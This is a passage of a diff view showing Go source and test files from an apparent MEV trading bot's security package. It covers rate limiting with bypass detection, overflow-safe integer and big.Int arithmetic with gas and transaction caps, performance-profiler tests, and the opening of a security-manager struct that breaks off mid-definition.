	assert.Greater(t, cpuEfficiency, 50.0)
}
// TestCleanupOldData seeds one alert older than the (very short) retention
// period and one fresh alert, then asserts cleanupOldData drops only the
// expired one.
func TestCleanupOldData(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	config := &ProfilerConfig{
		RetentionPeriod: 100 * time.Millisecond, // Very short for testing
	}
	profiler := NewPerformanceProfiler(testLogger, config)
	defer profiler.Stop()
	// Create some alerts
	profiler.mutex.Lock()
	oldAlert := PerformanceAlert{
		ID:        "old_alert",
		Timestamp: time.Now().Add(-200 * time.Millisecond), // Older than retention
	}
	newAlert := PerformanceAlert{
		ID:        "new_alert",
		Timestamp: time.Now(),
	}
	profiler.alerts = []PerformanceAlert{oldAlert, newAlert}
	profiler.mutex.Unlock()
	// Trigger cleanup
	profiler.cleanupOldData()
	// Verify old data was removed
	profiler.mutex.RLock()
	alerts := profiler.alerts
	profiler.mutex.RUnlock()
	assert.Len(t, alerts, 1)
	assert.Equal(t, "new_alert", alerts[0].ID)
}
// TestOptimizationPlanGeneration feeds three recommendations (immediate,
// short_term, long_term) into createOptimizationPlan and checks the total
// expected gain (sum) plus one-per-phase categorization.
func TestOptimizationPlanGeneration(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Create test recommendations
	recommendations := []PerformanceRecommendation{
		{
			Type:         "immediate",
			Priority:     "high",
			Category:     "memory",
			Title:        "Fix Memory Leak",
			ExpectedGain: 25.0,
		},
		{
			Type:         "short_term",
			Priority:     "medium",
			Category:     "algorithm",
			Title:        "Optimize Algorithm",
			ExpectedGain: 40.0,
		},
		{
			Type:         "long_term",
			Priority:     "low",
			Category:     "architecture",
			Title:        "Refactor Architecture",
			ExpectedGain: 15.0,
		},
	}
	// Generate optimization plan
	plan := profiler.createOptimizationPlan(recommendations)
	assert.NotNil(t, plan)
	assert.Equal(t, 80.0, plan.TotalGain) // 25 + 40 + 15
	assert.Greater(t, plan.Timeline, time.Duration(0))
	// Verify phase categorization
	assert.Len(t, plan.Phase1, 1) // immediate
	assert.Len(t, plan.Phase2, 1) // short_term
	assert.Len(t, plan.Phase3, 1) // long_term
	assert.Equal(t, "Fix Memory Leak", plan.Phase1[0].Title)
	assert.Equal(t, "Optimize Algorithm", plan.Phase2[0].Title)
	assert.Equal(t, "Refactor Architecture", plan.Phase3[0].Title)
}
// TestConcurrentOperationTracking runs 100 goroutines tracking the same
// operation name and asserts no calls are lost — a smoke test for the
// profiler's internal locking (run with -race for full value).
func TestConcurrentOperationTracking(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Run multiple operations concurrently
	numOperations := 100
	done := make(chan bool, numOperations)
	for i := 0; i < numOperations; i++ {
		go func(id int) {
			defer func() { done <- true }()
			tracker := profiler.StartOperation("concurrent_op")
			time.Sleep(1 * time.Millisecond)
			tracker.End()
		}(i)
	}
	// Wait for all operations to complete
	for i := 0; i < numOperations; i++ {
		<-done
	}
	// Verify all operations were tracked
	profiler.mutex.RLock()
	profile := profiler.operations["concurrent_op"]
	profiler.mutex.RUnlock()
	assert.NotNil(t, profile)
	assert.Equal(t, int64(numOperations), profile.TotalCalls)
	assert.Greater(t, profile.TotalDuration, time.Duration(0))
	assert.Equal(t, 0.0, profile.ErrorRate) // No errors expected
}
// BenchmarkOperationTracking measures the per-call overhead of
// StartOperation/End under parallel load (runtime.Gosched stands in for
// real work).
func BenchmarkOperationTracking(b *testing.B) {
	testLogger := logger.New("error", "text", "/tmp/test.log") // Reduce logging noise
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	b.ResetTimer()
	b.RunParallel(func(pb *testing.PB) {
		for pb.Next() {
			tracker := profiler.StartOperation("benchmark_op")
			// Simulate minimal work
			runtime.Gosched()
			tracker.End()
		}
	})
}
// BenchmarkReportGeneration measures GenerateReport cost against a profiler
// seeded with a small amount of operation data.
func BenchmarkReportGeneration(b *testing.B) {
	testLogger := logger.New("error", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Create some sample data
	for i := 0; i < 10; i++ {
		tracker := profiler.StartOperation("sample_op")
		time.Sleep(time.Microsecond)
		tracker.End()
	}
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := profiler.GenerateReport()
		if err != nil {
			b.Fatal(err)
		}
	}
}
// TestHealthScoreCalculation asserts a clean profiler scores "excellent",
// then injects poor/critical operations and warning/critical alerts and
// asserts the recomputed score drops and the label changes.
func TestHealthScoreCalculation(t *testing.T) {
	testLogger := logger.New("info", "text", "/tmp/test.log")
	profiler := NewPerformanceProfiler(testLogger, nil)
	defer profiler.Stop()
	// Test with clean system (should have high health score)
	health, score := profiler.calculateOverallHealth()
	assert.NotEmpty(t, health)
	assert.GreaterOrEqual(t, score, 0.0)
	assert.LessOrEqual(t, score, 100.0)
	assert.Equal(t, "excellent", health) // Should be excellent with no issues
	// Add some performance issues
	profiler.mutex.Lock()
	profiler.operations["poor_op"] = &OperationProfile{
		Operation:        "poor_op",
		PerformanceClass: "poor",
	}
	profiler.operations["critical_op"] = &OperationProfile{
		Operation:        "critical_op",
		PerformanceClass: "critical",
	}
	profiler.alerts = append(profiler.alerts, PerformanceAlert{
		Severity: "warning",
	})
	profiler.alerts = append(profiler.alerts, PerformanceAlert{
		Severity: "critical",
	})
	profiler.mutex.Unlock()
	// Recalculate health
	health2, score2 := profiler.calculateOverallHealth()
	assert.Less(t, score2, score)            // Score should be lower with issues
	assert.NotEqual(t, "excellent", health2) // Should not be excellent anymore
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,175 @@
package security
import (
"context"
"testing"
"time"
)
// TestEnhancedRateLimiter exercises the basic token-bucket path with sliding
// window and adaptive modes disabled: 10 requests fit the burst of 10, the
// next 5 are rejected. Global/user limits are set high so only the IP limit
// is under test.
func TestEnhancedRateLimiter(t *testing.T) {
	config := &RateLimiterConfig{
		IPRequestsPerSecond:     5,
		IPBurstSize:             10,
		GlobalRequestsPerSecond: 10000, // Set high global limit
		GlobalBurstSize:         20000, // Set high global burst
		UserRequestsPerSecond:   1000,  // Set high user limit
		UserBurstSize:           2000,  // Set high user burst
		SlidingWindowEnabled:    false, // Disabled for testing basic burst logic
		SlidingWindowSize:       time.Minute,
		SlidingWindowPrecision:  time.Second,
		AdaptiveEnabled:         false, // Disabled for testing basic burst logic
		AdaptiveAdjustInterval:  100 * time.Millisecond,
		SystemLoadThreshold:     80.0,
		BypassDetectionEnabled:  true,
		BypassThreshold:         3,
		CleanupInterval:         time.Minute,
		BucketTTL:               time.Hour,
	}
	rl := NewEnhancedRateLimiter(config)
	defer rl.Stop()
	ctx := context.Background()
	headers := make(map[string]string)
	// Test basic rate limiting
	for i := 0; i < 3; i++ {
		result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
		if !result.Allowed {
			t.Errorf("Request %d should be allowed, but got: %s - %s", i+1, result.ReasonCode, result.Message)
		}
	}
	// Test burst capacity (should allow up to burst size)
	// We already made 3 requests, so we can make 7 more before hitting the limit
	for i := 0; i < 7; i++ {
		result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
		if !result.Allowed {
			t.Errorf("Request %d should be allowed within burst, but got: %s - %s", i+4, result.ReasonCode, result.Message)
		}
	}
	// Now we should exceed the burst limit and be rate limited
	for i := 0; i < 5; i++ {
		result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
		if result.Allowed {
			t.Errorf("Request %d should be rate limited (exceeded burst)", i+11)
		}
	}
}
// TestSlidingWindow verifies a window with capacity 5 admits exactly 5
// requests and denies the 6th within the same window.
func TestSlidingWindow(t *testing.T) {
	window := NewSlidingWindow(5, time.Minute, time.Second)
	// Test within limit
	for i := 0; i < 5; i++ {
		if !window.IsAllowed() {
			t.Errorf("Request %d should be allowed", i+1)
		}
	}
	// Test exceeding limit
	if window.IsAllowed() {
		t.Error("Request should be denied after exceeding limit")
	}
}
// TestBypassDetection verifies normal traffic does not trip the detector and
// that repeated rate-limit hits escalate to at least MEDIUM severity. Only
// the final loop iteration's result is inspected — by then the hit count is
// well past the threshold.
func TestBypassDetection(t *testing.T) {
	detector := NewBypassDetector(3, time.Hour, time.Minute)
	headers := make(map[string]string)
	// Test normal behavior
	result := detector.DetectBypass("127.0.0.1", "TestAgent", headers, false)
	if result.BypassDetected {
		t.Error("Normal behavior should not trigger bypass detection")
	}
	// Test bypass pattern (multiple rate limit hits)
	for i := 0; i < 25; i++ { // Increased to trigger MEDIUM severity
		result = detector.DetectBypass("127.0.0.1", "TestAgent", headers, true)
	}
	if !result.BypassDetected {
		t.Error("Multiple rate limit hits should trigger bypass detection")
	}
	if result.Severity != "MEDIUM" && result.Severity != "HIGH" {
		t.Errorf("Expected MEDIUM or HIGH severity, got %s", result.Severity)
	}
}
// TestSystemLoadMonitor starts the monitor, waits two sampling intervals,
// and sanity-checks the reported CPU/memory percentages, load average, and
// goroutine count are in plausible ranges.
func TestSystemLoadMonitor(t *testing.T) {
	monitor := NewSystemLoadMonitor(100 * time.Millisecond)
	defer monitor.Stop()
	// Allow some time for monitoring to start
	time.Sleep(200 * time.Millisecond)
	cpu, memory, load, goroutines := monitor.GetCurrentLoad()
	if cpu < 0 || cpu > 100 {
		t.Errorf("CPU usage should be between 0-100, got %f", cpu)
	}
	if memory < 0 || memory > 100 {
		t.Errorf("Memory usage should be between 0-100, got %f", memory)
	}
	if load < 0 {
		t.Errorf("Load average should be positive, got %f", load)
	}
	if goroutines <= 0 {
		t.Errorf("Goroutine count should be positive, got %d", goroutines)
	}
}
// TestEnhancedMetrics verifies GetEnhancedMetrics exposes the expected keys
// (feature flags plus system load gauges) and that the flags reflect the
// enabled configuration.
func TestEnhancedMetrics(t *testing.T) {
	config := &RateLimiterConfig{
		IPRequestsPerSecond:    10,
		SlidingWindowEnabled:   true,
		AdaptiveEnabled:        true,
		AdaptiveAdjustInterval: 100 * time.Millisecond,
		BypassDetectionEnabled: true,
		CleanupInterval:        time.Second,
		BypassThreshold:        5,
		BypassDetectionWindow:  time.Minute,
		BypassAlertCooldown:    time.Minute,
	}
	rl := NewEnhancedRateLimiter(config)
	defer rl.Stop()
	metrics := rl.GetEnhancedMetrics()
	// Check that all expected metrics are present
	expectedKeys := []string{
		"sliding_window_enabled",
		"adaptive_enabled",
		"bypass_detection_enabled",
		"system_cpu_usage",
		"system_memory_usage",
		"system_load_average",
		"system_goroutines",
	}
	for _, key := range expectedKeys {
		if _, exists := metrics[key]; !exists {
			t.Errorf("Expected metric %s not found", key)
		}
	}
	// Verify boolean flags
	if metrics["sliding_window_enabled"] != true {
		t.Error("sliding_window_enabled should be true")
	}
	if metrics["adaptive_enabled"] != true {
		t.Error("adaptive_enabled should be true")
	}
	if metrics["bypass_detection_enabled"] != true {
		t.Error("bypass_detection_enabled should be true")
	}
}

View File

@@ -0,0 +1,54 @@
package security
import (
"fmt"
"math"
)
// SafeUint64ToUint32 converts uint64 to uint32, returning an error rather
// than silently truncating values that do not fit.
func SafeUint64ToUint32(value uint64) (uint32, error) {
	if value <= math.MaxUint32 {
		return uint32(value), nil
	}
	return 0, fmt.Errorf("value %d exceeds maximum uint32 value %d", value, math.MaxUint32)
}
// SafeUint64ToInt64 converts uint64 to int64, erroring when the value
// exceeds math.MaxInt64 (which would otherwise wrap negative).
func SafeUint64ToInt64(value uint64) (int64, error) {
	if value <= math.MaxInt64 {
		return int64(value), nil
	}
	return 0, fmt.Errorf("value %d exceeds maximum int64 value %d", value, math.MaxInt64)
}
// SafeUint64ToUint32WithDefault converts uint64 to uint32, substituting
// defaultValue when the input would overflow the target type.
func SafeUint64ToUint32WithDefault(value uint64, defaultValue uint32) uint32 {
	result := defaultValue
	if value <= math.MaxUint32 {
		result = uint32(value)
	}
	return result
}
// SafeAddUint64 adds two uint64 values, returning an error instead of
// wrapping around on overflow. Overflow is detected via the unsigned
// wraparound property: the sum is smaller than an operand iff it wrapped.
func SafeAddUint64(a, b uint64) (uint64, error) {
	sum := a + b
	if sum < a {
		return 0, fmt.Errorf("addition overflow: %d + %d exceeds maximum uint64 value", a, b)
	}
	return sum, nil
}
// SafeSubtractUint64 returns a-b, erroring when b > a (which would wrap
// around instead of producing a negative value).
func SafeSubtractUint64(a, b uint64) (uint64, error) {
	if b > a {
		return 0, fmt.Errorf("subtraction underflow: %d - %d results in negative value", a, b)
	}
	return a - b, nil
}
// SafeMultiplyUint64 multiplies two uint64 values, returning an error
// instead of wrapping on overflow.
func SafeMultiplyUint64(a, b uint64) (uint64, error) {
	// A zero factor can never overflow; also avoids dividing by zero below.
	if a == 0 || b == 0 {
		return 0, nil
	}
	if a > math.MaxUint64/b {
		return 0, fmt.Errorf("multiplication overflow: %d * %d exceeds maximum uint64 value", a, b)
	}
	return a * b, nil
}

View File

@@ -0,0 +1,343 @@
package security
import (
"math"
"testing"
)
// TestSafeUint64ToUint32 is a table-driven test covering zero, in-range,
// boundary (MaxUint32), and overflow inputs.
func TestSafeUint64ToUint32(t *testing.T) {
	tests := []struct {
		name        string
		input       uint64
		expected    uint32
		expectError bool
	}{
		{
			name:        "zero value",
			input:       0,
			expected:    0,
			expectError: false,
		},
		{
			name:        "small positive value",
			input:       1000,
			expected:    1000,
			expectError: false,
		},
		{
			name:        "max uint32 value",
			input:       math.MaxUint32,
			expected:    math.MaxUint32,
			expectError: false,
		},
		{
			name:        "overflow value",
			input:       math.MaxUint32 + 1,
			expected:    0,
			expectError: true,
		},
		{
			name:        "large overflow value",
			input:       math.MaxUint64,
			expected:    0,
			expectError: true,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := SafeUint64ToUint32(tt.input)
			if tt.expectError {
				if err == nil {
					t.Errorf("SafeUint64ToUint32(%d) expected error but got none", tt.input)
				}
			} else {
				if err != nil {
					t.Errorf("SafeUint64ToUint32(%d) unexpected error: %v", tt.input, err)
				}
				if result != tt.expected {
					t.Errorf("SafeUint64ToUint32(%d) = %d, want %d", tt.input, result, tt.expected)
				}
			}
		})
	}
}
// TestSafeUint64ToInt64 is a table-driven test covering zero, in-range,
// boundary (MaxInt64), and overflow inputs.
func TestSafeUint64ToInt64(t *testing.T) {
	tests := []struct {
		name        string
		input       uint64
		expected    int64
		expectError bool
	}{
		{
			name:        "zero value",
			input:       0,
			expected:    0,
			expectError: false,
		},
		{
			name:        "small positive value",
			input:       1000,
			expected:    1000,
			expectError: false,
		},
		{
			name:        "max int64 value",
			input:       math.MaxInt64,
			expected:    math.MaxInt64,
			expectError: false,
		},
		{
			name:        "overflow value",
			input:       math.MaxInt64 + 1,
			expected:    0,
			expectError: true,
		},
		{
			name:        "max uint64 value",
			input:       math.MaxUint64,
			expected:    0,
			expectError: true,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := SafeUint64ToInt64(tt.input)
			if tt.expectError {
				if err == nil {
					t.Errorf("SafeUint64ToInt64(%d) expected error but got none", tt.input)
				}
			} else {
				if err != nil {
					t.Errorf("SafeUint64ToInt64(%d) unexpected error: %v", tt.input, err)
				}
				if result != tt.expected {
					t.Errorf("SafeUint64ToInt64(%d) = %d, want %d", tt.input, result, tt.expected)
				}
			}
		})
	}
}
// TestSafeUint64ToUint32WithDefault verifies valid inputs pass through and
// overflowing inputs fall back to the supplied default.
func TestSafeUint64ToUint32WithDefault(t *testing.T) {
	tests := []struct {
		name         string
		input        uint64
		defaultValue uint32
		expected     uint32
	}{
		{
			name:         "valid value",
			input:        1000,
			defaultValue: 500,
			expected:     1000,
		},
		{
			name:         "overflow uses default",
			input:        math.MaxUint32 + 1,
			defaultValue: 500,
			expected:     500,
		},
		{
			name:         "max valid value",
			input:        math.MaxUint32,
			defaultValue: 500,
			expected:     math.MaxUint32,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := SafeUint64ToUint32WithDefault(tt.input, tt.defaultValue)
			if result != tt.expected {
				t.Errorf("SafeUint64ToUint32WithDefault(%d, %d) = %d, want %d",
					tt.input, tt.defaultValue, result, tt.expected)
			}
		})
	}
}
// TestSafeAddUint64 is a table-driven test covering normal sums, identity
// (adding zero), the exact-maximum boundary, and overflow.
func TestSafeAddUint64(t *testing.T) {
	tests := []struct {
		name        string
		a           uint64
		b           uint64
		expected    uint64
		expectError bool
	}{
		{
			name:        "small values",
			a:           100,
			b:           200,
			expected:    300,
			expectError: false,
		},
		{
			name:        "zero addition",
			a:           1000,
			b:           0,
			expected:    1000,
			expectError: false,
		},
		{
			name:        "overflow case",
			a:           math.MaxUint64,
			b:           1,
			expected:    0,
			expectError: true,
		},
		{
			name:        "near max valid",
			a:           math.MaxUint64 - 1,
			b:           1,
			expected:    math.MaxUint64,
			expectError: false,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := SafeAddUint64(tt.a, tt.b)
			if tt.expectError {
				if err == nil {
					t.Errorf("SafeAddUint64(%d, %d) expected error but got none", tt.a, tt.b)
				}
			} else {
				if err != nil {
					t.Errorf("SafeAddUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
				}
				if result != tt.expected {
					t.Errorf("SafeAddUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
				}
			}
		})
	}
}
// TestSafeMultiplyUint64 is a table-driven test covering normal products,
// zero/one identities, and two overflow cases.
func TestSafeMultiplyUint64(t *testing.T) {
	tests := []struct {
		name        string
		a           uint64
		b           uint64
		expected    uint64
		expectError bool
	}{
		{
			name:        "small values",
			a:           100,
			b:           200,
			expected:    20000,
			expectError: false,
		},
		{
			name:        "zero multiplication",
			a:           1000,
			b:           0,
			expected:    0,
			expectError: false,
		},
		{
			name:        "one multiplication",
			a:           1000,
			b:           1,
			expected:    1000,
			expectError: false,
		},
		{
			name:        "overflow case",
			a:           math.MaxUint64,
			b:           2,
			expected:    0,
			expectError: true,
		},
		{
			name:        "large values overflow",
			a:           math.MaxUint64 / 2,
			b:           3,
			expected:    0,
			expectError: true,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := SafeMultiplyUint64(tt.a, tt.b)
			if tt.expectError {
				if err == nil {
					t.Errorf("SafeMultiplyUint64(%d, %d) expected error but got none", tt.a, tt.b)
				}
			} else {
				if err != nil {
					t.Errorf("SafeMultiplyUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
				}
				if result != tt.expected {
					t.Errorf("SafeMultiplyUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
				}
			}
		})
	}
}
// TestSafeSubtractUint64 is a table-driven test covering normal differences,
// a zero result, subtracting zero, and underflow.
func TestSafeSubtractUint64(t *testing.T) {
	tests := []struct {
		name        string
		a           uint64
		b           uint64
		expected    uint64
		expectError bool
	}{
		{
			name:        "normal subtraction",
			a:           1000,
			b:           200,
			expected:    800,
			expectError: false,
		},
		{
			name:        "zero result",
			a:           1000,
			b:           1000,
			expected:    0,
			expectError: false,
		},
		{
			name:        "underflow case",
			a:           100,
			b:           200,
			expected:    0,
			expectError: true,
		},
		{
			name:        "subtract zero",
			a:           1000,
			b:           0,
			expected:    1000,
			expectError: false,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := SafeSubtractUint64(tt.a, tt.b)
			if tt.expectError {
				if err == nil {
					t.Errorf("SafeSubtractUint64(%d, %d) expected error but got none", tt.a, tt.b)
				}
			} else {
				if err != nil {
					t.Errorf("SafeSubtractUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
				}
				if result != tt.expected {
					t.Errorf("SafeSubtractUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
				}
			}
		})
	}
}

View File

@@ -0,0 +1,234 @@
package security
import (
"errors"
"fmt"
"math"
"math/big"
)
// Sentinel errors for safe-math failures. The helpers below wrap them with
// %w, so callers should match with errors.Is rather than equality on the
// wrapped error.
var (
	// ErrIntegerOverflow indicates an integer overflow would occur
	ErrIntegerOverflow = errors.New("integer overflow detected")
	// ErrIntegerUnderflow indicates an integer underflow would occur
	ErrIntegerUnderflow = errors.New("integer underflow detected")
	// ErrDivisionByZero indicates division by zero was attempted
	ErrDivisionByZero = errors.New("division by zero")
	// ErrInvalidConversion indicates an invalid type conversion
	ErrInvalidConversion = errors.New("invalid type conversion")
)
// SafeMath provides safe mathematical operations with overflow protection.
// The zero value is not usable (nil limit pointers would panic in Cmp);
// construct instances with NewSafeMath.
type SafeMath struct {
	// MaxGasPrice is the maximum allowed gas price in wei
	MaxGasPrice *big.Int
	// MaxTransactionValue is the maximum allowed transaction value
	MaxTransactionValue *big.Int
}
// NewSafeMath creates a SafeMath configured with the default security
// limits: a 10000 gwei gas-price cap and a 10000 ETH transaction-value cap
// (both expressed in wei).
func NewSafeMath() *SafeMath {
	gwei := big.NewInt(1e9)
	ether := big.NewInt(1e18)
	limit := big.NewInt(10000)
	return &SafeMath{
		MaxGasPrice:         new(big.Int).Mul(limit, gwei),
		MaxTransactionValue: new(big.Int).Mul(limit, ether),
	}
}
// SafeUint8 safely converts uint64 to uint8, returning an
// ErrIntegerOverflow-wrapped error instead of silently truncating.
func SafeUint8(val uint64) (uint8, error) {
	if val <= math.MaxUint8 {
		return uint8(val), nil
	}
	return 0, fmt.Errorf("%w: value %d exceeds uint8 max %d", ErrIntegerOverflow, val, math.MaxUint8)
}
// SafeUint32 safely converts uint64 to uint32, returning an
// ErrIntegerOverflow-wrapped error instead of silently truncating.
func SafeUint32(val uint64) (uint32, error) {
	if val <= math.MaxUint32 {
		return uint32(val), nil
	}
	return 0, fmt.Errorf("%w: value %d exceeds uint32 max %d", ErrIntegerOverflow, val, math.MaxUint32)
}
// SafeUint64FromBigInt safely converts a big.Int to uint64, rejecting nil,
// negative, and wider-than-64-bit values with distinct sentinel-wrapped
// errors.
func SafeUint64FromBigInt(val *big.Int) (uint64, error) {
	switch {
	case val == nil:
		return 0, fmt.Errorf("%w: nil value", ErrInvalidConversion)
	case val.Sign() < 0:
		return 0, fmt.Errorf("%w: negative value %s", ErrIntegerUnderflow, val.String())
	case val.BitLen() > 64:
		return 0, fmt.Errorf("%w: value %s exceeds uint64 max", ErrIntegerOverflow, val.String())
	default:
		return val.Uint64(), nil
	}
}
// SafeAdd returns a+b, rejecting nil operands and any sum above the
// configured maximum transaction value.
func (sm *SafeMath) SafeAdd(a, b *big.Int) (*big.Int, error) {
	if a == nil || b == nil {
		return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
	}
	sum := new(big.Int).Add(a, b)
	// Reject sums above the configured cap.
	if sum.Cmp(sm.MaxTransactionValue) > 0 {
		return nil, fmt.Errorf("%w: sum exceeds max transaction value", ErrIntegerOverflow)
	}
	return sum, nil
}
// SafeSubtract returns a-b, rejecting nil operands and any negative result.
func (sm *SafeMath) SafeSubtract(a, b *big.Int) (*big.Int, error) {
	if a == nil || b == nil {
		return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
	}
	diff := new(big.Int).Sub(a, b)
	// A negative difference is treated as underflow, not a valid result.
	if diff.Sign() < 0 {
		return nil, fmt.Errorf("%w: subtraction would result in negative value", ErrIntegerUnderflow)
	}
	return diff, nil
}
// SafeMultiply returns a*b, rejecting nil operands and any product above the
// configured maximum transaction value.
func (sm *SafeMath) SafeMultiply(a, b *big.Int) (*big.Int, error) {
	if a == nil || b == nil {
		return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
	}
	// Zero short-circuit: skip the multiplication and bound check entirely.
	if a.Sign() == 0 || b.Sign() == 0 {
		return big.NewInt(0), nil
	}
	product := new(big.Int).Mul(a, b)
	if product.Cmp(sm.MaxTransactionValue) > 0 {
		return nil, fmt.Errorf("%w: product exceeds max transaction value", ErrIntegerOverflow)
	}
	return product, nil
}
// SafeDivide returns a/b (truncated integer division), rejecting nil
// operands and a zero divisor.
func (sm *SafeMath) SafeDivide(a, b *big.Int) (*big.Int, error) {
	switch {
	case a == nil || b == nil:
		return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
	case b.Sign() == 0:
		return nil, ErrDivisionByZero
	default:
		return new(big.Int).Div(a, b), nil
	}
}
// SafePercent returns value*percent/100, i.e. percent is expressed in
// whole percent (120 yields 1.2x of value).
//
// NOTE(review): the 10000 cap combined with the /100 divisor allows
// results up to 100x value, not 100% as the cap's error message implies
// — confirm the intended unit with callers (CalculateMinimumProfit
// passes 120 meaning 120%).
func (sm *SafeMath) SafePercent(value *big.Int, percent uint64) (*big.Int, error) {
	if value == nil {
		return nil, fmt.Errorf("%w: nil value", ErrInvalidConversion)
	}
	if percent > 10000 {
		return nil, fmt.Errorf("%w: percent %d exceeds 10000 (100%%)", ErrIntegerOverflow, percent)
	}
	scaled := new(big.Int).Mul(value, new(big.Int).SetUint64(percent))
	return scaled.Div(scaled, big.NewInt(100)), nil
}
// ValidateGasPrice rejects nil, negative, or above-cap gas prices.
func (sm *SafeMath) ValidateGasPrice(gasPrice *big.Int) error {
	switch {
	case gasPrice == nil:
		return fmt.Errorf("gas price cannot be nil")
	case gasPrice.Sign() < 0:
		return fmt.Errorf("gas price cannot be negative")
	case gasPrice.Cmp(sm.MaxGasPrice) > 0:
		return fmt.Errorf("gas price %s exceeds maximum %s", gasPrice.String(), sm.MaxGasPrice.String())
	default:
		return nil
	}
}
// ValidateTransactionValue rejects nil, negative, or above-cap
// transaction values.
func (sm *SafeMath) ValidateTransactionValue(value *big.Int) error {
	switch {
	case value == nil:
		return fmt.Errorf("transaction value cannot be nil")
	case value.Sign() < 0:
		return fmt.Errorf("transaction value cannot be negative")
	case value.Cmp(sm.MaxTransactionValue) > 0:
		return fmt.Errorf("transaction value %s exceeds maximum %s", value.String(), sm.MaxTransactionValue.String())
	default:
		return nil
	}
}
// CalculateMinimumProfit returns the minimum profit a trade must earn to
// be worthwhile: the estimated gas cost plus a 20% safety margin
// (computed as 120% of gas cost).
func (sm *SafeMath) CalculateMinimumProfit(gasPrice, gasLimit *big.Int) (*big.Int, error) {
	if err := sm.ValidateGasPrice(gasPrice); err != nil {
		return nil, fmt.Errorf("invalid gas price: %w", err)
	}
	// Gas cost = price * limit; SafeMultiply also rejects a nil gasLimit.
	gasCost, err := sm.SafeMultiply(gasPrice, gasLimit)
	if err != nil {
		return nil, fmt.Errorf("failed to calculate gas cost: %w", err)
	}
	minProfit, err := sm.SafePercent(gasCost, 120)
	if err != nil {
		return nil, fmt.Errorf("failed to calculate buffer: %w", err)
	}
	return minProfit, nil
}
// SafeSlippage returns amount reduced by slippageBps basis points
// (1 bp = 0.01%); slippage above 10000 bps (100%) is rejected.
func (sm *SafeMath) SafeSlippage(amount *big.Int, slippageBps uint64) (*big.Int, error) {
	if amount == nil {
		return nil, fmt.Errorf("%w: nil amount", ErrInvalidConversion)
	}
	if slippageBps > 10000 {
		return nil, fmt.Errorf("%w: slippage %d bps exceeds maximum", ErrIntegerOverflow, slippageBps)
	}
	// Deduction = amount * bps / 10000.
	deduction := new(big.Int).Mul(amount, new(big.Int).SetUint64(slippageBps))
	deduction.Div(deduction, big.NewInt(10000))
	remaining := new(big.Int).Sub(amount, deduction)
	if remaining.Sign() < 0 {
		return nil, fmt.Errorf("%w: slippage exceeds amount", ErrIntegerUnderflow)
	}
	return remaining, nil
}

View File

@@ -0,0 +1,623 @@
package security
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"math/rand"
"net/http"
"os"
"reflect"
"sync"
"time"
"golang.org/x/time/rate"
"github.com/fraktal/mev-beta/internal/logger"
)
// SecurityManager provides centralized security management for the MEV bot:
// key custody, input validation, rate limiting, circuit breaking, TLS
// policy, emergency stop, and security alerting.
type SecurityManager struct {
	keyManager     *KeyManager      // single source of truth for signing keys
	inputValidator *InputValidator
	rateLimiter    *RateLimiter
	monitor        *SecurityMonitor // receives events and alerts; may be nil-checked by callers
	config         *SecurityConfig
	logger         *logger.Logger
	// Circuit breakers for different components
	rpcCircuitBreaker       *CircuitBreaker
	arbitrageCircuitBreaker *CircuitBreaker
	// TLS configuration
	tlsConfig *tls.Config
	// Rate limiters for different operations
	transactionLimiter *rate.Limiter
	rpcLimiter         *rate.Limiter
	// Security state
	emergencyMode  bool // NOTE(review): read/written from multiple goroutines without sync — confirm
	securityAlerts []SecurityAlert // most recent 1000, guarded by alertsMutex
	alertsMutex    sync.RWMutex
	// Metrics
	managerMetrics *ManagerMetrics
	rpcHTTPClient  *http.Client // TLS-configured client used by SecureRPCCall
}
// SecurityConfig contains all security-related configuration, loaded from
// YAML. Rate values are requests per second; durations use Go syntax.
type SecurityConfig struct {
	// Key management
	KeyStoreDir       string `yaml:"keystore_dir"`
	EncryptionEnabled bool   `yaml:"encryption_enabled"`
	// Rate limiting
	TransactionRPS int `yaml:"transaction_rps"`
	RPCRPS         int `yaml:"rpc_rps"`
	MaxBurstSize   int `yaml:"max_burst_size"`
	// Circuit breaker settings
	FailureThreshold int           `yaml:"failure_threshold"`
	RecoveryTimeout  time.Duration `yaml:"recovery_timeout"`
	// TLS settings
	TLSMinVersion   uint16   `yaml:"tls_min_version"`
	TLSCipherSuites []uint16 `yaml:"tls_cipher_suites"`
	// Emergency settings
	EmergencyStopFile string `yaml:"emergency_stop_file"` // sentinel file path polled by the monitor loop
	MaxGasPrice       string `yaml:"max_gas_price"`
	// Monitoring
	AlertWebhookURL string `yaml:"alert_webhook_url"`
